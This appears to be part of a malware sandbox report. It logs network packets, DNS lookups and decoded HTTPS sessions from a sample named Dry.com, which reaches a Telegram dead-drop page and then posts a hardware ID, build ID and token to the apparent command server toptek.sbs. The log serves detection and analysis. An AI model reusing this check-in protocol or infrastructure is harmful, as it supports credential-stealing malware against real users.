                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516678095 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516702890 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516829014 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516933918 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517040968 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517421007 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517462015 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517478943 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517533064 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517561913 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518008947 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518642902 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518678904 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518703938 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518728971 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518776894 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518795967 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518820047 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.546746016 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.620907068 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.276139021 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.276237965 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.277878046 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.277904034 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.280055046 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.280069113 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159605026 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159662008 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159724951 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159724951 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159774065 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159825087 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159830093 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159883976 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.160084963 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.160115957 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.162600040 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.162646055 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.162717104 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.162909985 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.162926912 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.563497066 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.563568115 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.570411921 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.570451021 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.572087049 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.572099924 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471395016 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471498013 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471561909 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471600056 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471623898 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471654892 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471765995 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471797943 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:08.944310904 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:08.944367886 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:08.944396973 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:08.944449902 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:08.945188999 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:08.945230007 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:09.569964886 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:09.570002079 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:09.570065022 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:09.570301056 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:09.570312977 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.973120928 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.973283052 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.973674059 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.973681927 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.975970030 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.975975037 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.976070881 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.976082087 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.976172924 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.976186037 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.976309061 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.976361036 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.976460934 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.976470947 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.976475000 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:10.976479053 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.719645023 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.719748974 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.719783068 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.719829082 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.719834089 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.719887018 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.719958067 CET49807443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.719974995 CET4434980794.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.760236979 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.760297060 CET4434981394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.760389090 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.760637999 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:12.760656118 CET4434981394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:14.167280912 CET4434981394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:14.167424917 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:14.172054052 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:14.172063112 CET4434981394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:14.174309969 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:14.174314976 CET4434981394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.075587034 CET4434981394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.075664043 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.075696945 CET4434981394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.075717926 CET4434981394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.075773954 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.076019049 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.076019049 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.077719927 CET49819443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.077771902 CET4434981994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.077861071 CET49819443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.078196049 CET49819443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.078212023 CET4434981994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.388746977 CET49813443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:15.388783932 CET4434981394.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:16.477051973 CET4434981994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:16.477154970 CET49819443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:16.477891922 CET49819443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:16.477905989 CET4434981994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:16.480424881 CET49819443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:16.480443954 CET4434981994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:17.384578943 CET4434981994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:17.384680033 CET4434981994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:17.384702921 CET49819443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:17.384743929 CET49819443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:17.385082006 CET49819443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:17.385101080 CET4434981994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:01.930978060 CET4988853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:02.187187910 CET53498881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:17.137743950 CET5826353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:17.275702000 CET53582631.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.222131968 CET5889853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.633975983 CET53588981.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:20.911536932 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.688081026 CET53495721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.721637964 CET53639281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.790251970 CET5958653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.790517092 CET5462353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.926732063 CET53595861.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.927246094 CET53546231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:38.494040966 CET53566091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:40.305870056 CET53618201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:01.930978060 CET192.168.2.41.1.1.10x3d70Standard query (0)bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmOA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:17.137743950 CET192.168.2.41.1.1.10x14d6Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.222131968 CET192.168.2.41.1.1.10x5cc6Standard query (0)toptek.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.790251970 CET192.168.2.41.1.1.10x7568Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.790517092 CET192.168.2.41.1.1.10x81cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:02.187187910 CET1.1.1.1192.168.2.40x3d70Name error (3)bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmOnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:17.275702000 CET1.1.1.1192.168.2.40x14d6No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:19.633975983 CET1.1.1.1192.168.2.40x5cc6No error (0)toptek.sbs94.130.188.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.926732063 CET1.1.1.1192.168.2.40x7568No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:21:35.927246094 CET1.1.1.1192.168.2.40x81cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                  • t.me
                                                                                                                                                                                                                                                                                  • toptek.sbs
                                                                                                                                                                                                                                                                                  • www.google.com
                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  0192.168.2.449741149.154.167.994437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:18 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: t.me
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:19 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:18 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Content-Length: 12295
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Set-Cookie: stel_ssid=ff4c4c8b33065ec21d_13460331070396189714; expires=Tue, 24 Dec 2024 05:21:18 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Cache-control: no-store
                                                                                                                                                                                                                                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:19 UTC12295INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  1192.168.2.44974294.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:21 UTC230OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:21 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  2192.168.2.44974394.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:23 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----T0ZUSR1VAI58QQI5XT2D
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 255
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:23 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 54 30 5a 55 53 52 31 56 41 49 35 38 51 51 49 35 58 54 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 35 34 31 34 41 31 46 30 39 41 32 39 31 39 33 31 34 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 54 30 5a 55 53 52 31 56 41 49 35 38 51 51 49 35 58 54 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 54 30 5a 55 53 52 31 56 41 49 35 38 51 51 49 35 58 54 32 44 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: ------T0ZUSR1VAI58QQI5XT2DContent-Disposition: form-data; name="hwid"0C5414A1F09A291931458-a33c7340-61ca------T0ZUSR1VAI58QQI5XT2DContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------T0ZUSR1VAI58QQI5XT2D--
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:24 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:24 UTC70INData Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 30 7c 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 7c 31 7c 31 7c 30 7c 31 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 3b1|1|1|0|a66c99b4ea1107d67781e132b296cd32|1|1|0|1|0|100000|10


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  3192.168.2.44974494.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:26 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BSRIEKXT2VAIEUSR9RQ9
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 53 52 49 45 4b 58 54 32 56 41 49 45 55 53 52 39 52 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 42 53 52 49 45 4b 58 54 32 56 41 49 45 55 53 52 39 52 51 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 42 53 52 49 45 4b 58 54 32 56 41 49 45 55 53 52 39 52 51 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------BSRIEKXT2VAIEUSR9RQ9Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------BSRIEKXT2VAIEUSR9RQ9Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------BSRIEKXT2VAIEUSR9RQ9Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:26 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
